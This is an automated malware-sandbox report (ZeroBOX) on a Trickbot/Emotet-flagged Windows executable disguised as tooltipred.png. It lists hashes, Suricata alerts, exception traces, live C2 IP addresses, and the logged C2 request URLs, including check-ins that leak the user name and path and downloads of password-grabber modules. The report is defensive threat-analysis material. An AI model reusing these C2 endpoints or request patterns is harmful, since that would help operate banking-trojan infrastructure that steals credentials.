Summary | ZeroBOX

tooltipred.png

Emotet Malicious Library AntiDebug PE File PE32 AntiVM
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 27, 2021, 3:30 p.m. Aug. 27, 2021, 3:42 p.m.
Size 820.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4f907ddbf3e599e3d4f6687dcf69e747
SHA256 f562e11d9edfea63f1c9a78e9081d85fc8547b9b70334f6d8935113de61df477
CRC32 6D56B26F
ssdeep 12288:QFuLe4nHJm79H5t51MKd3GydYLMcOCWvnJi7:QFF4nHJoBZbnJc
Yara
  • PE_Header_Zero - PE File Signature
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • Win32_Trojan_Emotet_1_Zero - Win32 Trojan Emotet

Name Response Post-Analysis Lookup
icanhazip.com 104.18.6.156
IP Address Status Action
104.21.19.200 Active Moloch
104.18.6.156 Active Moloch
164.124.101.2 Active Moloch
179.189.229.254 Active Moloch
194.146.249.137 Active Moloch
5.152.175.57 Active Moloch
62.99.79.77 Active Moloch
97.83.40.67 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49168 -> 5.152.175.57:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49171 -> 97.83.40.67:443 2404324 ET CNC Feodo Tracker Reported CnC Server group 25 A Network Trojan was detected
TCP 192.168.56.102:49166 -> 179.189.229.254:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 5.152.175.57:443 -> 192.168.56.102:49168 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49171 -> 97.83.40.67:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 97.83.40.67:443 -> 192.168.56.102:49171 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 179.189.229.254:443 -> 192.168.56.102:49166 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49167 -> 104.18.6.156:80 2013028 ET POLICY curl User-Agent Outbound Attempted Information Leak
TCP 192.168.56.102:49167 -> 104.18.6.156:80 2017398 ET POLICY IP Check Domain (icanhazip. com in HTTP Host) Attempted Information Leak

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49168
5.152.175.57:443
C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd 30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50
TLSv1
192.168.56.102:49166
179.189.229.254:443
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd C=AU, ST=Some-State, O=Internet Widgits Pty Ltd b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1
192.168.56.102:49171
97.83.40.67:443
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd C=AU, ST=Some-State, O=Internet Widgits Pty Ltd b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
packer Armadillo v1.71
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
hook_in_monitor+0x45 lde-0x133 @ 0x74e642ea
New_ntdll_NtOpenFile+0x2b New_ntdll_NtOpenKey-0x1ce @ 0x74e82c8b
FindFirstFileExW+0x1ee FindFirstFileW-0x2b2 kernelbase+0x592e @ 0x7fefde3592e
FindFirstFileW+0x1c GetFileType-0x44 kernelbase+0x5bfc @ 0x7fefde35bfc
0x96f7b
0x26c650

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x77919a5a
registers.r14: 1998657808
registers.r15: 6
registers.rcx: 1
registers.rsi: 52
registers.r10: 0
registers.rbx: 51
registers.rsp: 2541088
registers.r11: 1
registers.r8: 5
registers.r9: 1961940736
registers.rdx: 2
registers.r12: 0
registers.rbp: 1
registers.rdi: 2541712
registers.rax: 1
registers.r13: 2543932
1 0 0

__exception__

stacktrace:
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
hook_in_monitor+0x45 lde-0x133 @ 0x74e642ea
New_ntdll_NtFreeVirtualMemory+0x29 New_ntdll_NtGetContextThread-0xf2 @ 0x74e81fcf
RtlDestroyHandleTable+0x56 RtlRegisterThreadWithCsrss-0xfa ntdll+0x207f6 @ 0x779207f6
RtlIsDosDeviceName_U+0x137de NtdllDialogWndProc_A-0x1af8e ntdll+0x6d25e @ 0x7796d25e
RtlDeNormalizeProcessParams+0x346 CsrAllocateMessagePointer-0x33a ntdll+0x4e256 @ 0x7794e256
RtlAllocateHeap+0xd9d AlpcGetMessageAttribute-0x8c3 ntdll+0x5413d @ 0x7795413d

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x77919a5a
registers.r14: 2548060
registers.r15: 2547760
registers.rcx: 11
registers.rsi: 826181648
registers.r10: 0
registers.rbx: 1
registers.rsp: 2547664
registers.r11: 11
registers.r8: 5
registers.r9: 1961944576
registers.rdx: 2
registers.r12: 2547768
registers.rbp: 11
registers.rdi: 851418800
registers.rax: 1
registers.r13: 1
1 0 0

__exception__

stacktrace:
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
hook_in_monitor+0x45 lde-0x133 @ 0x74e642ea
New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x74e7fc86
VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefde63096
VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefde630d6
VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x7724bbe1
0x9407c

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x77919a5a
registers.r14: 803201040
registers.r15: 826182048
registers.rcx: 24
registers.rsi: 3
registers.r10: 0
registers.rbx: 3
registers.rsp: 2545832
registers.r11: -128
registers.r8: 3
registers.r9: 1961945856
registers.rdx: 3
registers.r12: 40
registers.rbp: 0
registers.rdi: 2546224
registers.rax: 4
registers.r13: 0
1 0 0
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/W86mMKPIM801nj2bSV6zifCFnf/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/path/C:%5CUsers%5Ctest22%5CAppData%5CLocal%5CTemp%5Ctooltipred.png/0/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features Connection to IP address suspicious_request GET https://5.152.175.57/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabb64/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/8uMoLXFfUKElAG6M7lPr/
suspicious_features Connection to IP address suspicious_request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
suspicious_features Connection to IP address suspicious_request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/b5Jb57X3TvfZJdxFT53d/
suspicious_features Connection to IP address suspicious_request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
suspicious_features Connection to IP address suspicious_request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
suspicious_features Connection to IP address suspicious_request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features Connection to IP address suspicious_request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/10/62/CETDHVSBTPT/7/
suspicious_features Connection to IP address suspicious_request GET https://5.152.175.57/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabc64/
request GET http://icanhazip.com/
request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/W86mMKPIM801nj2bSV6zifCFnf/
request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/path/C:%5CUsers%5Ctest22%5CAppData%5CLocal%5CTemp%5Ctooltipred.png/0/
request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
